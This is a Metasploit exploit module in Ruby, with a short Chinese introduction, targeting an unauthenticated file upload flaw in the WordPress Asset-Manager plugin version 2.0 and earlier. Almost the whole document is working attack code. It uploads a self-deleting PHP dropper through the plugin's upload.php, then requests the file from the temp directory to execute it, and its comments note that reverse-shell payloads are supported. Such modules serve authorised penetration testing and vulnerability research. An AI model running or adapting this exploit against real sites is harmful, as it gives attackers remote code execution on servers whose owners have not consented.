WordPress Asset-Manager PHP文件上传漏洞

这个模块利用的是 Metasploit 漏洞库中收录的 WordPress Asset-Manager 插件 2.0 及以下版本的漏洞。该插件的 upload.php 允许在未经身份验证的情况下向临时目录上传 PHP 文件,从而导致任意代码执行。
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##
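# Core framework plus the PhpEXE mixin that builds the self-deleting
# write-and-execute PHP dropper used by this module.
require 'msf/core'
require 'msf/core/exploit/php_exe'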
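# Unauthenticated arbitrary file upload in the WordPress Asset-Manager plugin
# (<= 2.0). upload.php stores whatever multipart file it is handed, under the
# client-supplied filename, inside a web-reachable temp directory. Uploading a
# .php file and then requesting it yields code execution as the web server user.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Vulnerable upload handler, relative to the WordPress root.
  UPLOAD_HANDLER = 'wp-content/plugins/asset-manager/upload.php'
  # Directory the handler writes uploads to, relative to the WordPress root;
  # the payload is requested back from here to trigger execution.
  UPLOAD_DIR = 'wp-content/uploads/assets/temp/'

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          # A NUL byte would truncate the PHP source written to disk.
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # TARGETURI normalised to end in exactly one slash, so plugin paths can be
  # appended directly.
  def base_uri
    uri = target_uri.path.dup
    uri << '/' unless uri.end_with?('/')
    uri
  end

  # Upload a randomly named PHP dropper through upload.php, then request it
  # from the temp directory. Raises via fail_with on an unexpected reply.
  def exploit
    uri = base_uri
    peer = "#{rhost}:#{rport}"
    # Random 5-letter name: avoids clobbering an existing file and keeps the
    # success check (filename echoed back) unambiguous.
    payload_name = "#{rand_text_alpha(5)}.php"
    # unlink_self: the dropped file removes itself once it runs, so no web
    # shell is left behind in the world-reachable temp directory.
    php_payload = get_write_exec_payload(:unlink_self => true)

    # Multipart body with the payload in the 'Filedata' field. The handler
    # trusts the client-supplied filename, which is what lets a .php land.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    # Rex::MIME::Message emits a leading CRLF before the first boundary; drop it.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}#{UPLOAD_HANDLER}",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # Success is judged by a 200 whose body echoes the stored filename; a
    # plain substring test avoids building a regex from the name.
    unless res && res.code == 200 && res.body.to_s.include?(payload_name)
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}#{UPLOAD_DIR}#{payload_name}",
      'method'  => 'GET'
    })

    # A nil response is tolerated: a payload that takes over the PHP worker
    # (e.g. a reverse shell) may never answer the GET. Only an explicit
    # non-200 status is treated as failure.
    if res && res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end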